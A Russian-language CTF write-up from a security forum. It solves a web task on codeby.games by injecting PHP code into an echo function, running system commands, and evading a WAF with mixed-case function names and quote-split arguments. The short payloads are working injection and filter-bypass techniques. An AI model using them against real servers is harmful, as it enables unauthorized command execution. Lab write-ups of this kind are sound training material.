Writeup Writeup обходной путь (Web codeby.games)

tree

Grey Team
15.10.2020
4
15
Привет! Разберем решение таска Обходной путь
Функционал приложения php функция - echo. появляется мысль о эксплутации php injection попробуем вывести phpinfo()
1702477113436.png

Сработало! значит попробуем выполнить команды на сервере через функцию system
echo '123';system(”id”);
1702477206743.png

WAF нас блочит, значит будем пробовать обойти фильтрацию.
echo '123';sYsTem("id");
1702477253977.png

Отлично! Пробуем посмотреть файлы в каталоге.
echo '123';sYsTem("ls");
но WAF снова нас заблочил, значит и тут найти обходной путь
echo ‘123’;sYsTem("'l''s'"’);
1702477455831.png

Дальше остается найти только флаг
 

Вложения

  • 1702477418066.png
    1702477418066.png
    80,8 КБ · Просмотры: 237
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab